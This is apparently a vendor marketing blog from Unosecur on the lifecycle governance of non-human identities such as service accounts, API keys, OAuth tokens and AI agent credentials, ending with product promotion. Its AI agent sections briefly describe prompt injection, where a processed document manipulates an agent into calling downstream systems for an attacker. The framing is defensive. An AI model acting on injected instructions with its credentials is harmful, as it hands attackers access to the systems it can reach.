Introduction
There are 144 non-human identities for every human identity in a modern automotive enterprise. That number comes from Unosecur's own research into the automotive sector, and the automotive industry is not an outlier. It is a preview. Every enterprise running cloud infrastructure, SaaS applications, and AI workloads is accumulating the same ratio at roughly the same speed. Service accounts were created for a migration that shipped eighteen months ago. API keys generated by a developer who left the company in Q1. OAuth tokens were issued to a SaaS tool that was canceled but never disconnected. AI agents deployed by three teams across AWS Bedrock, Google Vertex AI, and Azure OpenAI, each running under broad permissions and none of them governed.
These are non-human identities. And most enterprises have no program for them. This is not a gap that will close on its own. AI agent deployment is accelerating. Cloud environments are growing. SaaS sprawl is compounding. Every week, in enterprises that do not govern their NHIs, the attack surface expands quietly and automatically, without a single human making a deliberate decision to open the door.
This blog maps the NHI lifecycle from creation to offboarding, identifies exactly where governance fails at each stage, and explains what a functional NHI governance program actually looks like in 2026.
What is a non-human identity?
A non-human identity is any credential, token, key, or certificate that allows a machine, application, service, or automated process to authenticate and act within a system, without a human being present at the moment of execution.
The category is broader than most security teams realize. It includes:
Service accounts and directory identities (Active Directory, Okta, Google Workspace) are created to enable applications to authenticate to internal systems. Often provisioned with domain admin-level access because the developer needed it to work fast and never came back to scope it down.
API keys, static credentials issued by cloud providers, SaaS platforms, and internal services. Typically long-lived, rarely rotated, frequently hardcoded into application code. Tata Motors' 2025 breach exposed over 70TB of data because hardcoded AWS access keys were embedded in publicly accessible application code. No sophisticated exploit was required. The keys were just sitting there.
OAuth tokens are supposed to be short-lived, but are often long-lived in practice. Issued when a user or application authorizes a third-party connection. The token persists after the underlying user account is deactivated, the SaaS subscription is canceled, or the integration is rebuilt. Nobody revokes what nobody is tracking.
Certificates and secrets, TLS certificates, SSH keys, signing keys, database connection strings stored in CI/CD pipelines, container images, and configuration files.
AI agent credentials are the newest and least-governed category. An AI agent running on AWS Bedrock, Google Vertex AI, or Azure OpenAI operates under a service identity. That identity has permissions. Those permissions are almost always broader than the agent's actual task requires, because restricting them slows the deployment that the business is prioritizing. The governance gap that existed for service accounts in 2018 is being recreated, at scale, for AI agents right now.
The ratio of NHIs to human identities is 144:1 in complex enterprise environments. In most organizations, none of those 144 are governed with the same rigor as the one human identity beside them.
Why NHIs are the fastest-growing attack vector
Three structural forces are driving NHI growth, and none of them is slowing down.
Cloud sprawl.
Every cloud resource provisioned creates at least one NHI: the IAM role that controls access to it. Multi-cloud environments multiply this. An organization running workloads across AWS, GCP, and Azure does not have one IAM environment to govern. It has three, each with its own permission model, each generating its own inventory of service accounts, roles, and access keys.
SaaS integration density.
The average enterprise runs over 130 SaaS applications. Each integration between those applications requires at least one OAuth token or service account credential. Many require several. The business team that approved the integration did not think about the credential lifecycle. The security team did not know the integration existed.
AI agent adoption.
This is the acceleration factor that changes the calculus in 2026. AI agents are not passive applications that wait for a human request. They make decisions, chain tool calls, access data sources, and execute actions autonomously, under credentials that grant them persistent access to production systems. An AI agent managing fleet telemetry at an automotive OEM is simultaneously a human-equivalent actor with credentials, a non-human identity with API access, and an autonomous decision-maker operating across multiple systems. It inherits every vulnerability from both identity categories while introducing risks that neither was designed to address.
The five recurring attack patterns in the automotive sector, supply chain identity backdoor, human credential theft, NHI and secrets sprawl, cloud IAM misconfiguration, and lateral movement on valid accounts, all involve NHIs either as the initial access vector or the mechanism of lateral spread. CDK Global's breach brought 15,000 dealerships to a standstill because a single set of phished credentials gave attackers access to a centralized identity platform. VW's Cariad division exposed the precise GPS locations of 800,000 electric vehicle owners due to an improperly scoped cloud IAM policy, not a software vulnerability or a sophisticated exploit. Just a misconfigured machine identity permission.
The infrastructure was not broken. The access was.
The NHI lifecycle: Where governance fails at every stage
The NHI problem is not a single failure. It is a compound of small failures at every point in the credential lifecycle. Understanding where governance breaks down is the prerequisite for fixing it.
Stage 1: Creation — Where Overprivilege Starts
Most NHIs are created without a security review. A developer needs a service account to connect an application to a database. They create one, grant it the permissions required to unblock the deployment, and move on. The service account inherits far more access than the task requires because scoping it correctly would take additional time. The ticket is closed. The permission persists.
AI agents are provisioned the same way. A data science team deploys a Bedrock agent to summarise internal reports. They attach an IAM role to it. The role has read access to the S3 bucket containing the reports, write access, and access to three other buckets that were included in the same role because it was copied from an existing template. Nobody checks. The agent goes to production.
What good governance looks like at creation: every NHI created under a defined identity policy. Minimum required permissions are scoped at the time of provisioning, not after. Every credential is tied to an owner, a purpose, a business justification, and an expiry date. AI agents are provisioned with the principle of least privilege enforced before the first deployment, not retrofitted after the first incident.
Stage 2: Active Use — The Monitoring Blind Spot
Once created, NHIs are largely unmonitored. Human identities generate login events, MFA challenges, and audit trails. NHIs operate continuously in the background without those checkpoints. A service account making 10,000 API calls per day looks identical to one making 10,001 calls, one of which is exfiltrating customer records.
This is where traditional IAM tools fail entirely. They are built for human authentication events. They do not understand the context of NHI activity, what a service account should be doing versus what it is doing, whether an AI agent's tool call sequence is legitimate or the result of a prompt injection, whether an OAuth token is being used by the intended application or by an attacker who acquired it through credential stuffing.
Unosecur's approach to the usage stage is activity-based monitoring: centralized identity logs analyzed for anomalous access patterns, with detection rules aligned to MITRE ATT&CK. When a service account that normally reads from one S3 bucket begins listing all buckets in the environment, that is T1083 (File and Directory Discovery). When an AI agent that normally summarises documents begins calling external APIs, that is T1567 (Exfiltration Over Web Service). These are detectable. They are not being detected because there is no telemetry.
What good governance looks like at usage: continuous behavioral monitoring of every NHI. Anomaly detection that understands each credential's baseline activity pattern. Centralized audit logs that correlate NHI activity across cloud providers, SaaS platforms, and on-premises systems. For AI agents specifically: tool call logging that captures not just which tool was called, but the parameters passed, the session context, and the originating user request, because without that context, the SOC cannot distinguish a legitimate action from a prompt injection executed through a trusted credential.
Stage 3: Rotation — Policy Without Enforcement
The third stage is where most organizations have a policy but no enforcement. The policy says API keys rotate every 90 days. The enforcement is a developer manually remembering to do it. The reality is that 96% of enterprise permissions go unused, and the credentials attached to those unused permissions are almost never rotated, because the rotation process would require knowing the credentials exist.
Hardcoded secrets are the worst manifestation of this failure. Credentials embedded in source code, firmware images, CI/CD pipelines, and container images represent an invisible attack surface. Tata Motors' FleetEdge platform had AWS access keys hardcoded into publicly accessible application code. Those credentials were not in a secret manager. They were not on a rotation schedule. They were just there, waiting.
AI agent credentials compound the rotation problem. An agent created for a short-lived project often retains credentials long after the project ends. The team that built the agent has moved on. The credential is still active. Nobody has revoked it because nobody knows it exists.
What good governance looks like at rotation: automated credential rotation enforced at the platform level, not dependent on human memory. Secrets stored in a managed vault (AWS Secrets Manager, HashiCorp Vault, Azure Key Vault) with automatic rotation triggered by age or by anomaly detection. AI agent credentials are issued with short-lived tokens wherever the platform supports it. Long-lived credentials are flagged automatically and escalated for review. Rotation verified, not just triggered, but confirmed as completed without breaking the dependent application.
Stage 4: Offboarding — The Credentials Nobody Removes
Offboarding is where NHI governance fails most visibly, and where the consequences are most severe. When a human employee leaves an organization, an HR process is in place. The account is deactivated. When a service account is no longer needed, there is often no process at all. The account persists. The permissions persist. The credential persists.
VW's Cariad breach did not require an attacker to compromise a human employee. An improperly decommissioned cloud IAM configuration and a machine identity left active after its purpose was complete were sufficient to expose the data of 800,000 vehicle owners for several months. The breach did not require credential theft or exploitation of a software vulnerability. Misconfigured machine identity permissions were sufficient.
For AI agents, the offboarding problem is structural. Agents are deployed for specific use cases, a proof-of-concept, a pilot program, or a quarterly analysis run. When the use case ends, the agent is often simply stopped rather than deprovisioned. Its credentials remain valid. Its permissions remain active. If an attacker later gains access to the environment, those dormant agent credentials represent a pre-provisioned attack path with elevated access.
What good governance looks like at offboarding: automated deprovisioning triggered by inactivity detection. Any NHI with zero activity for 30 days should be flagged for review and, absent a business justification, deprovisioned. For AI agents: formal offboarding as part of the agent lifecycle policy, including credential revocation, permission cleanup, and confirmation that no downstream systems retain a dependency on the revoked credentials.
Why standard IAM tools cannot solve this
The standard IAM toolset was built for a different era. Identity governance platforms (IGA) are designed around the concept of a human identity requesting access, a manager approving it, and a periodic access review certifying that the access is still appropriate. That model assumes human decision-making at every step.
NHIs break every assumption. There is no human requesting the access; a deployment script provisions it. There is no manager certifying it; the system that created the service account lacks a manager field. The periodic access review process, conducted quarterly at most organizations, cannot keep pace with environments where new NHIs are created daily, and AI agents can acquire permissions in seconds.
Cloud IAM tools (AWS IAM, Azure RBAC, GCP IAM) provide mechanisms for controlling NHI permissions, but they do not provide the visibility layer that enables governance. They can tell you what permissions a service account has. They cannot tell you whether those permissions are appropriate, whether the service account is still in use, whether its credentials have been exposed, or whether an AI agent running under those credentials is behaving as intended.
SIEM platforms aggregate logs. They do not understand the context of NHI activity. They can tell you a credential was used. They cannot tell you whether the use was legitimate. What the market needs, and what Unosecur's Unified Identity Fabric provides, is a layer that sits across human identities, NHIs, and AI agents simultaneously, applying continuous posture management (ISPM), real-time threat detection (ITDR), and lifecycle governance (NHI Management) from a single control plane.
What functional NHI governance looks like in practice
A functional NHI governance program in 2026 has four operational components.
Discovery that Finds Everything.
You cannot govern what you cannot see. Most organizations discover NHIs the way they discover shadow IT, after a breach. A functional program requires continuous automated discovery across every environment: cloud IAM roles, SaaS OAuth connections, CI/CD pipeline secrets, container image credentials, and AI agent service identities. Unosecur's AI Agent Discovery capability extends this to the newest NHI category, building a cross-cloud inventory of every Bedrock agent, Vertex AI agent, Azure OpenAI function, and MCP-connected agent in the environment, each with its event history, effective permissions, and risk score.
Posture Management That Enforces Least Privilege Continuously.
Discovering an over-privileged service account is useful. Remediating it automatically before it becomes a breach vector is what changes the risk profile. ISPM (Identity Security Posture Management) continuously compares every NHI's assigned permissions against its actual historical activity. A service account with write access to 47 S3 buckets that has only ever read from two of them should be scoped to two. That remediation should happen automatically, or with a single approval workflow, not a six-month access review cycle.
Behavioral Detection That Catches Abuse In Runtime.
Even well-governed credentials get compromised. ITDR (Identity Threat Detection and Response) provides the runtime layer, monitoring every NHI's activity pattern, flagging deviations, and enabling one-click quarantine before lateral movement completes. The benchmark is five-minute MTTD/MTTR. At that response time, the blast radius of a compromised NHI is contained before the attacker reaches a second system.
Lifecycle Management With Automated Offboarding.
The rotation and offboarding stages of the NHI lifecycle should not depend on human memory. Automated rotation schedules, inactivity-triggered deprovisioning, and integrated offboarding workflows that revoke credentials when projects end or employees leave, are the operational floor for any organization serious about NHI governance.
The AI Agent Governance Imperative
AI agents deserve specific treatment in any NHI governance discussion, because they are not simply another type of service account. They are autonomous decision-makers that can take actions a human operator did not explicitly authorize at the moment of execution.
When an AI agent running on AWS Bedrock processes a document and decides to call a downstream API, that is an autonomous action taken under a credential. If the credential has excessive permissions, the agent can reach systems its operators never intended it to access. If the document contains a prompt injection, the agent can be manipulated into calling those systems on behalf of an attacker. If the credential is never rotated, an attacker who acquires it, through code exposure, secrets sprawl, or lateral movement, retains persistent access to every system the agent can reach.
Unosecur's MCP Gateway adds a critical additional layer for AI agents that operate via the Model Context Protocol. Every tool call made by an MCP-connected agent passes through the gateway, where it is authenticated, authorized against the agent's defined policy, and logged. This means the SOC has full visibility into what AI agents are doing at the execution layer, not just what credentials they hold, but what actions they are taking with those credentials, in runtime, against which systems, and with what parameters.
The organizations that will build secure AI programs in 2026 are those that govern AI agent identities before the agents go to production, not after the first incident forces the question.
Starting Points for IAM Leads and CISOs
If an NHI governance program does not exist at your organization today, three actions provide the most immediate risk reduction:
Build The Inventory First.
You cannot prioritize what you cannot count. Run a discovery scan across your cloud environments, SaaS connections, and CI/CD systems. Count the NHIs. Categorize them by type and by the sensitivity of the systems they access. The number will be larger than your team expects. That is the starting point, not a reason to delay.
Apply Immediate Remediation To The Highest-Risk Credentials.
Service accounts with domain admin access. API keys embedded in source code repositories. OAuth tokens tied to deactivated user accounts. AI agents with write access to production data stores. These are not edge cases in most enterprise environments. They are the norm. Remediate the highest-risk items first, then build the program around preventing recurrence.
Instrument the AI Agent Deployment Process Before It Scales Further.
Every new AI agent should be provisioned under a defined identity policy that includes minimum required permissions, a named owner, a documented purpose, a rotation schedule, and an offboarding trigger. If that governance does not exist today, the time to build it is before the next agent deployment, not after the next breach.
The 144:1 ratio is not a statistic from an outlier industry. It is a preview of where every enterprise is heading. The organizations that treat non-human identity governance as a core security program, not an IAM hygiene item, will be the ones that can deploy AI at scale without the incident that forces the board to ask why nobody was watching the machines.
How Unosecur Solves Non-Human Identity Governance
Unosecur's Unified Identity Fabric brings every identity, human, non-human, and AI agent, into a single operational view, covering ownership, permissions, activity, and access paths. Tenant provisioning takes 15 minutes, with findings surfacing at runtime.
Discovery Across Every Layer
Unosecur inventories every service account, API key, OAuth token, workload identity, and AI agent credential across cloud, SaaS, on-prem, and identity providers, continuously, without replacing existing tools.
Posture And Right-Sizing
Compares granted permissions against actual usage and recommends activity-based reductions, generating least-privilege policies as cloud-native templates that engineering can apply directly.
Runtime Threat Detection
Tracks how each NHI and AI agent normally behaves and flags meaningful deviations the moment they happen, with containment running human-in-the-loop.
Ai Agent Governance
The MCP Auth Gateway enforces identity and authorization at the protocol layer for every agent tool call, making AI agents a controlled, auditable layer of the environment.
Conclusion
Non-human identities are growing faster than most security programs can keep up with. Every cloud service, SaaS integration, and AI agent introduces new credentials that require continuous visibility and governance. Without a structured approach, these identities become an expanding attack surface that traditional IAM tools were never designed to address.
The organizations that succeed with AI and cloud adoption will be those that govern non-human identities from creation to retirement, not after an incident. Book a demo with Unosecur to discover every non-human identity, enforce least privilege, monitor runtime activity, and secure the complete identity lifecycle from a single platform.
See every non-human identity in your environment, book a demo with the Unosecur team.



%201.png)



